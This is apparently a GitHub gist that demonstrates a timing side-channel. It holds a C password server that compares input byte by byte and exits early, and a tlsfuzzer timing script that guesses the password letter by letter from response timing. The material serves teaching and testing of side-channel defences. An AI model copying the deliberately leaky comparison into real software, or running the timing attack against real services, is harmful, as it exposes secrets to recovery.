Created
October 15, 2023 18:45
-
-
Save tomato42/46b8f6a1a05fb894d3a26b3ace6d6df1 to your computer and use it in GitHub Desktop.
Example server checking password with a timing side-channel and a tlsfuzzer script to attack it
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <fcntl.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
#include <netdb.h> | |
#include <netinet/in.h> | |
#include <string.h> | |
#include <stdint.h> | |
#include <inttypes.h> | |
#include <byteswap.h> | |
void doprocessing (int sock, const char *password); | |
int main( int argc, char *argv[] ) { | |
int sockfd, newsockfd, portno; | |
struct sockaddr_in serv_addr, cli_addr; | |
unsigned int clilen; | |
/* simple obfuscation of the password */ | |
char ciphertext[32] = "\x4b\x71\xbc\xe8\x41\xf0\xbf\x96\xff\xf4\x09\xc2\x6c\x1b\x44\x63\xa2\xfc\xda\xb7\xd1\x23\x96\x25\x98\xca\xfb\xe9\x70\xc4\x15\x55"; | |
char key[32] = "\x26\x10\xce\x9e\x28\x9e\xbf\x96\x3c\xd1\x93\x39\xb7\xb6\xdd\x31\xc1\xd9\xad\x49\x00\x82\x1c\xc5\xcc\x30\x49\x77\x3d\x8b\x39\x14"; | |
char password[32]; | |
for (int i=0; i<32; i++) | |
password[i] = ciphertext[i] ^ key[i]; | |
/* First call to socket() function */ | |
sockfd = socket(AF_INET, SOCK_STREAM, 0); | |
if (sockfd < 0) { | |
perror("ERROR opening socket"); | |
exit(1); | |
} | |
int enable = 1; | |
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(int)) < 0){ | |
perror("ERROR can't set SO_REUSEADDR"); | |
exit(1); | |
} | |
/* Initialize socket structure */ | |
bzero((char *) &serv_addr, sizeof(serv_addr)); | |
portno = 5001; | |
serv_addr.sin_family = AF_INET; | |
serv_addr.sin_addr.s_addr = INADDR_ANY; | |
serv_addr.sin_port = htons(portno); | |
/* Now bind the host address using bind() call.*/ | |
if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) { | |
perror("ERROR on binding"); | |
exit(1); | |
} | |
/* Now start listening for the clients, here | |
* process will go in sleep mode and will wait | |
* for the incoming connection | |
*/ | |
listen(sockfd, 5); | |
clilen = sizeof(cli_addr); | |
while (1) { | |
newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen); | |
if (newsockfd < 0) { | |
perror("ERROR on accept"); | |
exit(1); | |
} | |
doprocessing(newsockfd, password); | |
} /* end of while */ | |
} | |
void doprocessing (int sock, const char *password) { | |
int ret; | |
char data[33]; | |
char *a; | |
const char *b; | |
ret = read(sock, data, 32); | |
if (ret < 0) { | |
perror("ERROR reading from socket"); | |
exit(1); | |
} | |
data[ret] = '\x00'; | |
/* check if all the letters match */ | |
for (a=data, b=password; *a != '\n' && *a != '\x00' && *b != '\n' && *b != '\x00'; a++, b++) { | |
if (*a != *b) { | |
goto end; | |
} | |
} | |
/* check if length matches */ | |
if (!((*a == '\n' || *a == '\x00') && (*b == '\n' || *b == '\x00'))) { | |
goto end; | |
} | |
/* provide the secret if the password was correct */ | |
ret = write(sock, "secret\n", 7); | |
if (ret < 0) { | |
perror("ERROR writing to socket"); | |
exit(1); | |
} | |
end: | |
/* reply with a TLS Alert message for ease of analysis with tlsfuzzer */ | |
ret = write(sock, "\x15\x03\x03\x00\x02\x02\x28", 7); | |
if (ret < 0) { | |
perror("ERROR writing to socket"); | |
exit(1); | |
} | |
ret = shutdown(sock, SHUT_RDWR); | |
if (ret < 0) { | |
perror("ERROR closing socket"); | |
exit(1); | |
} | |
close(sock); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Hubert Kario, (c) 2023 | |
# Released under Gnu GPL v2.0, see LICENSE file for details | |
"""Timing tester of a password server.""" | |
from __future__ import print_function | |
import traceback | |
import sys | |
import getopt | |
from itertools import chain, repeat | |
from random import sample | |
import os | |
from tlsfuzzer.runner import Runner | |
from tlsfuzzer.timing_runner import TimingRunner | |
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \ | |
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \ | |
FinishedGenerator, ApplicationDataGenerator, AlertGenerator, \ | |
TCPBufferingEnable, TCPBufferingDisable, TCPBufferingFlush, fuzz_mac, \ | |
fuzz_padding, RawSocketWriteGenerator | |
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \ | |
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \ | |
ExpectAlert, ExpectClose | |
from tlslite.constants import CipherSuite, AlertLevel, AlertDescription, \ | |
ExtensionType | |
from tlslite.utils.dns_utils import is_valid_hostname | |
from tlslite.extensions import SNIExtension, SignatureAlgorithmsCertExtension,\ | |
SignatureAlgorithmsExtension | |
from tlsfuzzer.utils.lists import natural_sort_keys | |
from tlsfuzzer.utils.ordered_dict import OrderedDict | |
from tlsfuzzer.helpers import SIG_ALL, RSA_PKCS1_ALL | |
from tlsfuzzer.utils.statics import WARM_UP | |
from tlsfuzzer.utils.log import Log | |
version = 1 | |
def help_msg(): | |
print("Usage: <script-name> [-h hostname] [-p port] [[probe-name] ...]") | |
print(" -h hostname name of the host to run the test against") | |
print(" localhost by default") | |
print(" -p port port number to use for connection, 4433 by default") | |
print(" probe-name if present, will run only the probes with given") | |
print(" names and not all of them, e.g \"sanity\"") | |
print(" -e probe-name exclude the probe from the list of the ones run") | |
print(" may be specified multiple times") | |
print(" -x probe-name expect the probe to fail. When such probe passes despite being marked like this") | |
print(" it will be reported in the test summary and the whole script will fail.") | |
print(" May be specified multiple times.") | |
print(" -X message expect the `message` substring in exception raised during") | |
print(" execution of preceding expected failure probe") | |
print(" usage: [-x probe-name] [-X exception], order is compulsory!") | |
print(" -n num run 'num' or all(if 0) tests instead of default(50)") | |
print(" (excluding \"sanity\" tests)") | |
print(" -a desc the expected alert description for invalid Finished") | |
print(" messages - 20 (bad_record_mac) by default") | |
print(" Note: other values are NOT RFC compliant!") | |
print(" -l level the expected alert level for invalid Finished") | |
print(" - 2 (fatal) by default") | |
print(" Note: other values are NOT RFC compliant!") | |
print(" -i interface Allows recording timing information") | |
print(" on specified interface. Required to enable timing tests") | |
print(" -o dir Specifies output directory for timing information") | |
print(" /tmp by default") | |
print(" --base str Already guessed letters") | |
print(" --repeat rep How many timing samples should be gathered for each test") | |
print(" 100 by default") | |
print(" --no-safe-renego Allow the server not to support safe") | |
print(" renegotiation extension") | |
print(" --no-sni do not send server name extension.") | |
print(" Sends extension by default if the hostname is a") | |
print(" valid DNS name, not an IP address") | |
print(" --cpu-list Set the CPU affinity for the tcpdump process") | |
print(" See taskset(1) man page for the syntax of this") | |
print(" option. Not used by default.") | |
print(" --byte-len Number of bytes to encode the values in, 1 by default") | |
print(" --baseline Number sent for the base measurement, 10 by default") | |
print(" --difference Number that the baseline is modified to create signal, 1 by default") | |
print(" --no-quickack Don't assume that QUICKACK is in use.") | |
print(" --no-alert Don't expect the server to send an alert before closing connection.") | |
print(" --help this message") | |
def main(): | |
"""Check if server doesn't process password byte by byte""" | |
host = "localhost" | |
port = 5001 | |
num_limit = None | |
run_exclude = set() | |
expected_failures = {} | |
last_exp_tmp = None | |
alert = AlertDescription.bad_record_mac | |
level = AlertLevel.fatal | |
srv_extensions = {ExtensionType.renegotiation_info: None} | |
no_sni = False | |
repetitions = 100 | |
interface = None | |
timing = False | |
outdir = "/tmp" | |
cipher = CipherSuite.TLS_RSA_WITH_AES_128_CBC_SHA | |
affinity = None | |
byte_len = 0 | |
baseline = 10 | |
difference = 1 | |
no_alert = False | |
no_quickack = False | |
base = "" | |
argv = sys.argv[1:] | |
opts, args = getopt.getopt(argv, | |
"h:p:e:x:X:n:a:l:l:o:i:", | |
["help", | |
"no-safe-renego", | |
"no-sni", | |
"repeat=", | |
"cpu-list=", | |
"baseline=", | |
"difference=", | |
"base=", | |
"no-quickack", | |
"no-alert"]) | |
for opt, arg in opts: | |
if opt == '-h': | |
host = arg | |
elif opt == '-p': | |
port = int(arg) | |
elif opt == '-e': | |
run_exclude.add(arg) | |
elif opt == '-x': | |
expected_failures[arg] = None | |
last_exp_tmp = str(arg) | |
elif opt == '-X': | |
if not last_exp_tmp: | |
raise ValueError("-x has to be specified before -X") | |
expected_failures[last_exp_tmp] = str(arg) | |
elif opt == '-n': | |
num_limit = int(arg) | |
elif opt == '-a': | |
alert = int(arg) | |
elif opt == '-l': | |
level = int(arg) | |
elif opt == "-i": | |
timing = True | |
interface = arg | |
elif opt == '-o': | |
outdir = arg | |
elif opt == "--repeat": | |
repetitions = int(arg) | |
elif opt == "--no-safe-renego": | |
srv_extensions = None | |
elif opt == "--no-sni": | |
no_sni = True | |
elif opt == "--cpu-list": | |
affinity = arg | |
elif opt == "--byte-len": | |
byte_len = int(arg) | |
if byte_len < 1: | |
raise ValueError("--byte-len must be a positive integer") | |
elif opt == "--baseline": | |
baseline = int(arg) | |
if baseline < 0: | |
raise ValueError("--baseline can't be negative") | |
elif opt == "--difference": | |
difference = int(arg) | |
if difference < 0: | |
raise ValueError("--difference can't be negative") | |
elif opt == "--no-quickack": | |
no_quickack = True | |
elif opt == "--base": | |
base = arg | |
elif opt == '--help': | |
help_msg() | |
sys.exit(0) | |
elif opt == "--no-alert": | |
no_alert = True | |
else: | |
raise ValueError("Unknown option: {0}".format(opt)) | |
if args: | |
run_only = set(args) | |
else: | |
run_only = None | |
conversations = OrderedDict() | |
generators = OrderedDict() | |
conversation = Connect(host, port) | |
node = conversation | |
node = node.add_child(RawSocketWriteGenerator(b"X")) | |
node = node.add_child(ExpectAlert()) | |
node.add_child(ExpectClose()) | |
conversations["sanity"] = conversation | |
conversation = Connect(host, port) | |
node = conversation | |
byte_len = len(base) + 1 | |
node = node.add_child(RawSocketWriteGenerator(bytes(base + 'a', 'utf-8'))) | |
gen_node = node | |
node = node.add_child(ExpectAlert()) | |
node.add_child(ExpectClose()) | |
conversations["a - canary"] = conversation | |
generators["a - canary"] = gen_node | |
for i in range(26): | |
lttr = chr(ord('a')+i) | |
conversation = Connect(host, port) | |
node = conversation | |
node = node.add_child(RawSocketWriteGenerator(bytes(base + chr(ord('a')+i), 'utf-8'))) | |
gen_node = node | |
node = node.add_child(ExpectAlert()) | |
node.add_child(ExpectClose()) | |
conversations["{0}".format(lttr)] = conversation | |
generators["{0}".format(lttr)] = gen_node | |
# run the conversation | |
good = 0 | |
bad = 0 | |
xfail = 0 | |
xpass = 0 | |
failed = [] | |
xpassed = [] | |
if not num_limit: | |
num_limit = len(conversations) | |
# make sure that sanity test is run first and last | |
# to verify that server was running and kept running throughout | |
sanity_tests = [('sanity', conversations['sanity'])] | |
if run_only: | |
if num_limit > len(run_only): | |
num_limit = len(run_only) | |
regular_tests = [(k, v) for k, v in conversations.items() if k in run_only] | |
else: | |
regular_tests = [(k, v) for k, v in conversations.items() if | |
(k != 'sanity') and k not in run_exclude] | |
if num_limit < len(conversations): | |
sampled_tests = sample(regular_tests, min(num_limit, len(regular_tests))) | |
else: | |
sampled_tests = regular_tests | |
ordered_tests = chain(sanity_tests, sampled_tests, sanity_tests) | |
for c_name, c_test in ordered_tests: | |
print("{0} ...".format(c_name)) | |
runner = Runner(c_test) | |
res = True | |
exception = None | |
try: | |
runner.run() | |
except Exception as exp: | |
exception = exp | |
print("Error while processing") | |
print(traceback.format_exc()) | |
res = False | |
if c_name in expected_failures: | |
if res: | |
xpass += 1 | |
xpassed.append(c_name) | |
print("XPASS-expected failure but test passed\n") | |
else: | |
if expected_failures[c_name] is not None and \ | |
expected_failures[c_name] not in str(exception): | |
bad += 1 | |
failed.append(c_name) | |
print("Expected error message: {0}\n" | |
.format(expected_failures[c_name])) | |
else: | |
xfail += 1 | |
print("OK-expected failure\n") | |
else: | |
if res: | |
good += 1 | |
print("OK\n") | |
else: | |
bad += 1 | |
failed.append(c_name) | |
print("Test end") | |
print(20 * '=') | |
print("""Test timing of server doing password compare""") | |
print(20 * '=') | |
print("version: {0}".format(version)) | |
print(20 * '=') | |
print("TOTAL: {0}".format(len(sampled_tests) + 2 * len(sanity_tests))) | |
print("SKIP: {0}".format(len(run_exclude.intersection(conversations.keys())))) | |
print("PASS: {0}".format(good)) | |
print("XFAIL: {0}".format(xfail)) | |
print("FAIL: {0}".format(bad)) | |
print("XPASS: {0}".format(xpass)) | |
print(20 * '=') | |
sort = sorted(xpassed, key=natural_sort_keys) | |
if len(sort): | |
print("XPASSED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort))) | |
sort = sorted(failed, key=natural_sort_keys) | |
if len(sort): | |
print("FAILED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort))) | |
if bad or xpass: | |
sys.exit(1) | |
elif timing: | |
# if regular tests passed, run timing collection and analysis | |
if TimingRunner.check_tcpdump(): | |
tests = [('generic', None)] | |
timing_runner = TimingRunner("{0}_v{1}".format( | |
sys.argv[0], | |
version), | |
tests, | |
outdir, | |
host, | |
port, | |
interface, | |
affinity, | |
skip_extract=True, | |
no_quickack=no_quickack) | |
print("Pre-generating pre-master secret values...") | |
with open( | |
os.path.join(timing_runner.out_dir, 'data_values.bin'), | |
"wb" | |
) as data_file: | |
# create a real order of tests to run | |
log = Log(os.path.join(timing_runner.out_dir, "real_log.csv")) | |
actual_tests = [] | |
node_dict = {} | |
for c_name, c_test in sampled_tests: | |
if run_only and c_name not in run_only or \ | |
c_name in run_exclude: | |
continue | |
if not c_name.startswith("sanity"): | |
actual_tests.append(c_name) | |
node_dict[c_name] = generators[c_name] | |
log.start_log(actual_tests) | |
for _ in range(repetitions): | |
log.shuffle_new_run() | |
log.write() | |
log.read_log() | |
test_classes = log.get_classes() | |
queries = chain(repeat(0, WARM_UP), log.iterate_log()) | |
# generate the PMS values | |
for executed, index in enumerate(queries): | |
g_name = test_classes[index] | |
g_node = node_dict[g_name] | |
res = g_node | |
assert len(res.data) == byte_len, \ | |
len(res.data) | |
data_file.write(res.data) | |
# fake the set of tests to run so it's just one | |
data_file = open( | |
os.path.join(timing_runner.out_dir, 'data_values.bin'), | |
"rb" | |
) | |
conversation = Connect(host, port) | |
node = conversation | |
node = node.add_child(RawSocketWriteGenerator( | |
data_file=data_file, | |
data_length=byte_len | |
)) | |
node = node.add_child(ExpectAlert()) | |
node.add_child(ExpectClose()) | |
tests[:] = [('generic', conversation)] | |
print("Running timing tests...") | |
timing_runner.generate_log( | |
['generic'], [], | |
repetitions * len(actual_tests)) | |
ret_val = timing_runner.run() | |
if ret_val != 0: | |
print("run failed") | |
sys.exit(ret_val) | |
os.remove(os.path.join(timing_runner.out_dir, 'log.csv')) | |
os.rename( | |
os.path.join(timing_runner.out_dir, 'real_log.csv'), | |
os.path.join(timing_runner.out_dir, 'log.csv') | |
) | |
print("starting extraction") | |
if not timing_runner.extract(fin_as_resp=no_alert): | |
print("extract") | |
ret_val = 2 | |
else: | |
print("analysis") | |
ret_val = timing_runner.analyse() | |
if ret_val == 0: | |
print("No statistically significant difference detected") | |
elif ret_val == 1: | |
print("Statistically significant difference detected") | |
else: | |
print("Statistical analysis exited with {0}".format(ret_val)) | |
sys.exit(ret_val) | |
else: | |
print("Could not run timing tests because tcpdump is not present!") | |
sys.exit(1) | |
print(20 * '=') | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment